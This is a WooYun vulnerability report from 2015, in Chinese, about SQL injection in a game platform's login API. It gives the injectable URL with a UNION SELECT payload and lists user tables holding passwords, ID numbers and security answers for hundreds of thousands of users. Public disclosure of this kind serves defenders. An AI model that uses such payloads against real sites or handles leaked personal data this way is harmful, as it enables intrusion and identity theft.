缺陷编号:WooYun-2015-0128966
漏洞标题:5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏
相关厂商:5e游戏平台
漏洞作者:渔村安全实验室
提交时间:2015-07-24 14:24
公开时间:2015-09-07 14:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
2015-07-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-07: 厂商已经主动忽略漏洞,细节向公众公开
5e游戏网站SQL注入漏洞导致100W+条用户记录泄漏
http://login.5ebo.com/api.php?op=game_list_api&gid=9&count=3gid参数有问题http://login.5ebo.com/api.php?op=game_list_api&gid=99999.9+union+all+select+1,user(),version(),3,4--+a&count=3
部份敏感的表项信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
uc_members<br> count:612774<br> uid<br> username<br> password<br> email<br> myid<br> myidkey<br> regip<br> regdate<br> lastloginip<br> lastlogintime<br> salt<br> secques<br> repass<br> markv9_admin<br> count:9<br> userid<br> username<br> password<br> roleid<br> encrypt<br> lastloginip<br> lastlogintime<br> email<br> realname<br> card<br> langv9_member<br> count:599417<br> userid<br> phpssouid<br> username<br> password<br> encrypt<br> nickname<br> regdate<br> lastdate<br> regip<br> lastip<br> loginnum<br> email<br> groupid<br> areaid<br> amount<br> point<br> modelid<br> message<br> islock<br> vip<br> vipexp<br> overduedate<br> siteid<br> connectid<br> from<br> mobile<br> isbinding<br> media<br> media_uid<br> invite_uid<br> is_callback<br> idnumber<br> adult<br> realname<br> islogin<br> signcount<br> signlastdate<br> is_salesman<br> salesman_point<br> salesman_charge<br> v9_member_detail<br> count:535928<br> userid<br> username<br> birthday<br> save_question<br> save_answer<br> sex<br> province<br> city<br> address<br> postcode<br> channel<br> unit<br> source<br> save_question_2<br> save_answer_2<br> save_question_3<br> save_answer_3v9_sso_members<br> count:230299<br> uid<br> username<br> password<br> random<br> email<br> regip<br> regdate<br> lastip<br> lastdate<br> appname<br> type<br> avatar<br> ucuserid |
管理员账号信息泄漏:
个人用户的注册信息泄露的内容包括账号名,用户真实名称与身份证ID等敏感信息
泄露的信息还有游戏服务器的配置信息
游戏内用户角色的数据
这个子妈妈再也不用怕我玩游戏了,瞬间顶级金币随便刷啊有木有
未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)
我靠,我给alex说你
啥,不懂
原文连接
的情况下转载,若非则不得使用我方内容。